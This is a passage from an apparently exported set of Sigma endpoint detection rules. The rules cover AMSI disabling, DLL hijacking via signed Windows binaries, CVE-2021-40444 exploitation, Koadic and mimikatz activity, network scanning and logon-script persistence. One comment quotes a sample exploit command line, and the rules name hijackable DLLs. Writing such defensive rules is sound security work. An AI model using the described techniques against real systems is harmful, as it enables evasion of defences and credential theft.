'?:\\windows\\system32\\amsi.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3baaf0d-46b7-451f-a695-6acea23a6bca",
"rule_name": "AMSI Registry COM Object Modified",
"rule_description": "Detects the modification of the registry value related to the Microsoft Defender Component Object Model (COM) object for AMSI.\nAn adversary with administrative rights can disable the Antimalware Scan Interface (AMSI) by overriding the Microsoft Defender COM object and make it point to a DLL that does not exist.\nAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\nIt is recommended to ensure that the process has legitimate reasons to perform this action.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.015",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3c805a2-724f-46bf-9027-9913a4dcea34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082245Z",
"creation_date": "2026-03-23T11:45:34.082248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_colorcpl.yml",
"content": "title: DLL Hijacking via colorcpl.exe\nid: b3c805a2-724f-46bf-9027-9913a4dcea34\ndescription: |\n Detects potential Windows DLL Hijacking via colorcpl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'colorcpl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ColorAdapterClient.dll'\n - '\\colorui.dll'\n - '\\IPHLPAPI.DLL'\n - '\\mscms.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3c805a2-724f-46bf-9027-9913a4dcea34",
"rule_name": "DLL Hijacking via colorcpl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via colorcpl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3e570a5-4349-42f9-a6d2-c2ce464e61bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592855Z",
"creation_date": "2026-03-23T11:45:34.592859Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chkntfs.yml",
"content": "title: DLL Hijacking via chkntfs.exe\nid: b3e570a5-4349-42f9-a6d2-c2ce464e61bd\ndescription: |\n Detects potential Windows DLL Hijacking via chkntfs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chkntfs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3e570a5-4349-42f9-a6d2-c2ce464e61bd",
"rule_name": "DLL Hijacking via chkntfs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chkntfs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3f72539-195c-43f0-9b1a-d3ed3f8dbc89",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608449Z",
"creation_date": "2026-03-23T11:45:34.608452Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608460Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
"https://success.trendmicro.com/solution/000288999",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1203_microsoft_mshtml.yml",
"content": "title: Microsoft MSHTML Remote Code Execution CVE-2021-40444 Vulnerability Exploited\nid: b3f72539-195c-43f0-9b1a-d3ed3f8dbc89\ndescription: |\n Detects a potential exploitation of the Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444).\n An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n The attacker would then have to convince the user to open the malicious document, triggering unwanted code execution.\n It is recommended to analyze the code executed by control.exe as well as the opened document to look for malicious content.\nreferences:\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\n - https://success.trendmicro.com/solution/000288999\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2021/09/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2021-40444\n - classification.Windows.Exploit.MSHTML\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n Image|endswith: '\\control.exe'\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\POWERPNT.EXE'\n selection_2:\n # \"C:\\Windows\\System32\\control.exe\" \".cpl:../../../AppData/Local/Temp/Low/championship.inf\",\n Image|endswith: '\\control.exe'\n CommandLine|contains: '../'\n ParentImage|endswith: '\\iexplore.exe'\n\n exclusion_input:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\control.exe input.dll'\n - '?:\\Windows\\system32\\control.exe input.dll'\n - '?:\\windows\\SysWOW64\\control.exe SYSTEM'\n - '?:\\windows\\system32\\control.exe SYSTEM'\n\n condition: (selection_1 and not 
exclusion_input) or selection_2\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3f72539-195c-43f0-9b1a-d3ed3f8dbc89",
"rule_name": "Microsoft MSHTML Remote Code Execution CVE-2021-40444 Vulnerability Exploited",
"rule_description": "Detects a potential exploitation of the Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444).\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\nThe attacker would then have to convince the user to open the malicious document, triggering unwanted code execution.\nIt is recommended to analyze the code executed by control.exe as well as the opened document to look for malicious content.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b4429290-fb41-4135-9038-d778706c2f2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587394Z",
"creation_date": "2026-03-23T11:45:34.587397Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587405Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tabcal.yml",
"content": "title: DLL Hijacking via tabcal.exe\nid: b4429290-fb41-4135-9038-d778706c2f2b\ndescription: |\n Detects potential Windows DLL Hijacking via tabcal.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tabcal.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\drprov.dll'\n - '\\HID.DLL'\n - '\\NInput.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b4429290-fb41-4135-9038-d778706c2f2b",
"rule_name": "DLL Hijacking via tabcal.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tabcal.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b44d2c13-759d-4eac-a3b2-08f79d059047",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091356Z",
"creation_date": "2026-03-23T11:45:34.091358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091363Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz/wiki",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c#L58",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L41",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L20",
"https://attack.mitre.org/techniques/T1055/004/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1055_koadic_notepad_injection.yml",
"content": "title: Suspicious Invocation of notepad.exe linked to Koadic Process Injection\nid: b44d2c13-759d-4eac-a3b2-08f79d059047\ndescription: |\n Detects the usage of Koadic, a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n Koadic uses notepad.exe to inject a DLL and execute mimikatz on the host machine.\n This rule may be triggered by other frameworks or malwares than Koadic.\n It is recommended to investigate the context of this action to determine the legitimacy of the Notepad execution.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/wiki\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c#L58\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L41\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L20\n - https://attack.mitre.org/techniques/T1055/004/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/16\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.004\n - attack.t1055.012\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Koadic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\sysnative\\notepad.exe'\n - OriginalFileName: 'NOTEPAD.EXE'\n selection_2:\n ParentImage|endswith: '\\rundll32.exe'\n\n # If notepad.exe was started with a path in its command line, it's probably a false positive.\n exclusion_fp:\n CommandLine: '*notepad*\\\\*'\n\n exclusion_known_fp_parent:\n ParentCommandLine|contains:\n - 'shell32.dll,OpenAs_RunDLL'\n - 'shell32.dll,RunAsNewUser_RunDLL'\n - 'shell32.dll,SHCreateLocalServerRunDll'\n - 'url.dll,FileProtocolHandler'\n - 'printui.dll,PrintUIEntryDPIAware'\n\n 
condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b44d2c13-759d-4eac-a3b2-08f79d059047",
"rule_name": "Suspicious Invocation of notepad.exe linked to Koadic Process Injection",
"rule_description": "Detects the usage of Koadic, a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nKoadic uses notepad.exe to inject a DLL and execute mimikatz on the host machine.\nThis rule may be triggered by frameworks or malware other than Koadic.\nIt is recommended to investigate the context of this action to determine the legitimacy of the Notepad execution.\n",
"rule_creation_date": "2021-02-16",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.004",
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b462248e-6e88-400f-af8b-767f81572f57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083364Z",
"creation_date": "2026-03-23T11:45:34.083367Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083371Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/angryip/ipscan/",
"https://unit42.paloaltonetworks.com/muddled-libra/",
"https://www.safebreach.com/blog/phobos-ransomware-ivanti-connect-secure-cert-alert-aa24-060a_060b/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_angry_ip_scanner_executed.yml",
"content": "title: Angry IP Scanner Executed\nid: b462248e-6e88-400f-af8b-767f81572f57\ndescription: |\n Detects the execution of Angry IP scanner.\n Angry IP Scanner is a Java-based IP scanner known for being used by threat actors like Muddled Libra.\n It is recommended to analyze the execution context of this binary and any other alerts to determine its legitimacy.\nreferences:\n - https://github.com/angryip/ipscan/\n - https://unit42.paloaltonetworks.com/muddled-libra/\n - https://www.safebreach.com/blog/phobos-ransomware-ivanti-connect-secure-cert-alert-aa24-060a_060b/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/04/02\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1046\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AngryIPScanner\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'ipscan.exe'\n ProcessDescription:\n - 'Angry IP scanner'\n - 'Angry IP Scanner - fast and friendly network scanner'\n\n # Legitimate installation\n filter_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b462248e-6e88-400f-af8b-767f81572f57",
"rule_name": "Angry IP Scanner Executed",
"rule_description": "Detects the execution of Angry IP scanner.\nAngry IP Scanner is a Java-based IP scanner known for being used by threat actors like Muddled Libra.\nIt is recommended to analyze the execution context of this binary and any other alerts to determine its legitimacy.\n",
"rule_creation_date": "2025-04-02",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1046"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b49b7d13-3131-4107-aa45-a4af1207096b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071607Z",
"creation_date": "2026-03-23T11:45:34.071609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1037/001/"
],
"name": "t1037_001_persistence_registry_environ_userinitmprlogonscript.yml",
"content": "title: UserInitMprLogonScript Environment Variable Set via Registry\nid: b49b7d13-3131-4107-aa45-a4af1207096b\ndescription: |\n Detects a modification of the UserInitMprLogonScript environment variable in registry.\n This value of this variable is a path to a script that will be run at every logon.\n Attackers can register a malicious script to establish persistence on an infected host.\n It is recommended to investigate the path in the value set in the registry to determine its legitimacy, as well as the process responsible for this registry modification.\nreferences:\n - https://attack.mitre.org/techniques/T1037/001/\ndate: 2020/09/25\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1037.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Environment\\UserInitMprLogonScript'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b49b7d13-3131-4107-aa45-a4af1207096b",
"rule_name": "UserInitMprLogonScript Environment Variable Set via Registry",
"rule_description": "Detects a modification of the UserInitMprLogonScript environment variable in registry.\nThe value of this variable is the path to a script that will be run at every logon.\nAttackers can register a malicious script to establish persistence on an infected host.\nIt is recommended to investigate the path in the value set in the registry to determine its legitimacy, as well as the process responsible for this registry modification.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1037.001",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b4d8fde4-7113-455b-9cf6-22c00f2d8384",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607181Z",
"creation_date": "2026-03-23T11:45:34.607184Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607192Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/mimidrv-in-depth-4d273d19e148",
"https://attack.mitre.org/techniques/T1569/002",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1569_002_mimikatz_service_installed.yml",
